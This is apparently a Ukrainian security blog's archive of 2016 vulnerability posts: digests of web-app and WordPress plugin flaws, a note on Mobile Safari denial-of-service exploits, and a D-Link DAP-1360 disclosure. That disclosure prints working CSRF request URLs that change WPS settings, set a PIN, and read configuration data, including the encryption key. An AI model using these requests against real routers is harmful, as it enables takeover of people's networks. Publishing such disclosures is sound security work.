Архів для категорії 'Уразливості'

Добірка уразливостей

17:21 16.03.2016

В даній добірці уразливості в веб додатках:

  • Path Traversal/Remote Code Execution in WD Arkeia Network Backup Appliances (деталі)
  • Vulnerability in perl-Plack (деталі)
  • Vulnerability in perl-Mojolicious (деталі)
  • ResourceSpace Multiple Cross Site Scripting and SQL Injection Vulnerabilities (деталі)
  • SAP Router Password Timing Attack (деталі)

DoS уразливості в Mobile Safari

23:54 27.02.2016

В середині грудня я провів перевірку всіх своїх експлоітів для браузерів з 2006 року, що я оприлюднив на сайті (та деяких не оприлюднених експлоітів). І виявив численні Denial of Service уразливості в Mobile Safari 6.0.1 та 8.4.1 для iOS.

Раніше я писав про Denial of Service та Cross-Site Scripting уразливості в Mobile Safari. Це друга частина уразливостей.

Denial of Service (WASC-10):

Вибивання браузера чи зависання (з подальшим вибиванням).

IE DoS Exploit5.html - в 6.0.1, а в 8.4.1 без вибивання, лише споживання 60% CPU.

Mozilla, IE, Chrome & Opera DoS.html - в 6.0.1, а в 8.4.1 без вибивання, лише споживання 70% CPU.

Mozilla, Opera & Chrome DoS Exploit.html - в 6.0.1.

Opera DoS Exploit (freeze).html - в 6.0.1, а в 8.4.1 без вибивання, лише споживання 60% CPU.

Opera DoS Exploit.html - в 6.0.1, а в 8.4.1 без вибивання, лише споживання 60% CPU.

Opera DoS Exploit3.html - в 6.0.1, а в 8.4.1 без вибивання, лише споживання 60% CPU.

Opera DoS Exploit4.html - в 6.0.1, а в 8.4.1 без вибивання, лише споживання 60% CPU.

Наступні атаки призводять до блокування всього браузера (потрібно по хитрому розблоковувати чи повністю перезапускати):

Firefox & IE & Chrome DoS Exploit.html

Firefox & IE & Chrome DoS Exploit2.html

Firefox & IE & Chrome DoS Exploit3.txt

Firefox DoS Exploit5.html

Уразливі Mobile Safari 6.0.1, 8.4.1 та попередні версії для iOS.

Уразливості в плагінах для WordPress №213

22:42 26.02.2016

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах MP3-Jplayer, InBoundio Marketing, Foxypress, W3 Total Cache та в версіях WordPress до 1.5.1.3. Для котрих з’явилися експлоіти.

  • WordPress MP3-Jplayer 2.1 Local File Disclosure (деталі)
  • WordPress InBoundio Marketing Shell Upload (деталі)
  • WordPress Foxypress uploadify.php Arbitrary Code Execution (деталі)
  • WordPress W3 Total Cache PHP Code Execution (деталі)
  • WordPress cache_lastpostdate Arbitrary Code Execution (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Добірка уразливостей

17:28 25.02.2016

В даній добірці уразливості в веб додатках:

  • HP Integrated Lights-Out 2 (iLO 2) Denial of Service (деталі)
  • Multiple vulnerabilities in phpMyAdmin (деталі)
  • Сross-Site Request Forgery (CSRF) in xEpan (деталі)
  • Tuleap <= 7.6-4 (register.php) PHP Object Injection Vulnerability (деталі)
  • Weak firmware encryption and predictable WPA key on Sitecom routers (деталі)

Уразливості в плагінах для WordPress №212

23:59 23.02.2016

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах WPML, Reflex Gallery, Yoast Google Analytics, Ajax Search Pro, AB Google Map Travel. Для котрих з’явилися експлоіти.

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Добірка уразливостей

20:01 23.02.2016

В даній добірці уразливості в веб додатках:

Уразливості в плагінах для WordPress №211

23:58 29.01.2016

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Pie Register, Huge IT Slider, WPML, Yoast SEO і темі Fraction. Для котрих з’явилися експлоіти.

  • WordPress Fraction Theme 1.1.1 Privilege Escalation (деталі)
  • WordPress Pie Register 2.0.14 Cross Site Scripting (деталі)
  • WordPress Huge IT Slider 2.6.8 SQL Injection (деталі)
  • WordPress WPML XSS / Deletion / SQL Injection (деталі)
  • WordPress SEO By Yoast 1.7.3.3 SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Добірка уразливостей

17:21 28.01.2016

В даній добірці уразливості в веб додатках:

  • ClassLoader manipulation issue confirmed for Struts 1 (деталі)
  • Struts 1 - Mitigation Advice Available, Possible RCE Impact (деталі)
  • drupal7 security update (деталі)
  • Multiple SQL Injection in SP Client Document Manager plugin (деталі)
  • Struts 2.3.16.3 GA release available - security fix (деталі)

Нові CSRF уразливості в D-Link DAP-1360

20:09 27.01.2016

Продовжуючи тему уразливостей в D-Link DAP-1360. У квітні, 30.04.2014, я виявив Cross-Site Request Forgery уразливості в D-Link DAP-1360 (Wi-Fi Access Point and Router).

CSRF (WASC-09):

В розділі Wi-Fi - WPS можна змінити параметр WPS Enable:

Увімкнути:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=106&res_struct_size=0&res_buf={%22wps%22:{%22WscEnable%22:true,%22WscConfigured%22:true}}

Вимкнути:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=106&res_struct_size=0&res_buf={%22wps%22:{%22WscEnable%22:false,%22WscConfigured%22:true}}

Можна відмінити конфігурацію (Reset to unconfigured):

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=106&res_struct_size=0&res_buf={%22wps%22:{%22WscEnable%22:true,%22WscConfigured%22:false}}

Можна прочитати дані про конфігурацію в Information - Refresh. Через XSS атаку з цієї сторінки можна отримати дані про ключ Encryption key (це спрацює навіть при вимкненому WPS):

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_config_action=1&res_config_id=35&res_struct_size=0

Можна змінити метод в Connection - WPS Method:

PBC:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=107&res_struct_size=0&res_buf={%22wps%22:{%22WscEnable%22:true,%22WscMethod%22:%22PBC%22}}

PIN:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=107&res_struct_size=0&res_buf={%22wps%22:{%22WscEnable%22:true,%22WscMethod%22:%22PIN%22,%22WscPin%22:%2211111111%22}}

Уразлива версія D-Link DAP-1360, Firmware 1.0.0. Дана модель з іншими прошивками також повинна бути вразливою.

Добірка уразливостей

17:28 26.01.2016

В даній добірці уразливості в веб додатках:

  • HP Network Node Manager I (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Unauthorized Access, Execution of Arbitrary Code (деталі)
  • Reflected Cross-Site Scripting (XSS) in Simple Email Form Joomla Extension (деталі)
  • Multiple SQL Injections in Dolibarr ERP & CRM (деталі)
  • Vulnerability in php-ZendFramework (деталі)
  • Struts 2.3.16.2 GA release available - security fix (деталі)